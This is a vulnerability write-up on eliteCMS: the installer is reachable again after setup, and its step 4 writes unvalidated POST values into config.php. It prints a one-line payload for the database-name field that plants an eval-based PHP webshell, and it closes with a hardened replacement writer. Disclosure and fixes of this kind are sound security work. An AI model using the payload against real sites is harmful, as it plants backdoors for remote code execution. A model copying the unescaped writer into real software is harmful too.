
eliteCMS installer not locked + one-line webshell write vulnerability

Posted on 2012-11-18 13:59:27
eliteCMS's installer is not locked after installation completes, so an attacker can re-run the installation by visiting the installer URL.

Another flaw is that the installer can write a one-line webshell directly into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... omitted ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values are interpolated into the generated source unescaped
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled text is written to config.php as-is
    $writer = fopen($file, 'w');
...

Now look at this code:

// Installer form values are stored in the session without validation
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name POST value is:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written into /admin/includes/config.php.
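A hardened version of the step-4 config writer, added here as an example and not eliteCMS's own code: it refuses to run once an install.lock file exists, validates each DB value against an allow-list pattern before it reaches a generated source file, and emits the values with var_export() so a quote in the input cannot terminate the string literal. The lock-file path, the CONFIG_FILE constant, the allowed-character patterns and the function names are assumptions.

```php
<?php
// Added example (not eliteCMS code). Assumed paths: install.lock next to the
// installer, config.php at the same relative location the report shows.
define('INSTALL_LOCK', __DIR__ . '/install.lock');
define('CONFIG_FILE', __DIR__ . '/../admin/includes/config.php');

// Fix for the first issue: the installer must not run again after completion.
function install_is_locked(): bool {
    return file_exists(INSTALL_LOCK);
}

// Fix for the second issue, part 1: reject values that make no sense for a
// host/name/user before they are ever written anywhere (patterns are assumed).
function validate_db_value(string $key, string $value): string {
    $pattern = ($key === 'DB_PASS')
        ? '/^[\x20-\x7E]{0,128}$/'          // printable ASCII only
        : '/^[A-Za-z0-9_.\-:]{1,64}$/';      // host, db name, user
    if (!preg_match($pattern, $value)) {
        throw new InvalidArgumentException("invalid value for $key");
    }
    return $value;
}

// Fix for the second issue, part 2: build the file with var_export(), which
// emits a properly quoted and escaped PHP string literal, instead of
// interpolating raw input into a double-quoted string as the original does.
function build_config(array $db): string {
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $value = validate_db_value($key, $db[$key] ?? '');
        $out .= 'define(' . var_export($key, true) . ', '
              . var_export($value, true) . ");\n";
    }
    return $out;
}

function write_config(array $db): void {
    if (install_is_locked()) {
        http_response_code(403);
        exit('Installation already completed.');
    }
    $tmp = CONFIG_FILE . '.tmp';
    file_put_contents($tmp, build_config($db), LOCK_EX);
    rename($tmp, CONFIG_FILE);   // atomic replace of the config file
    touch(INSTALL_LOCK);         // lock out any further installer runs
}

// Usage in the installer's step 4 (form values come from $_POST as before):
// write_config($_POST);
```

With this writer, a DB_NAME containing `"` or `?>` is rejected by the pattern, and even if the pattern were loosened, var_export() would keep it inside a single-quoted literal rather than letting it close the string.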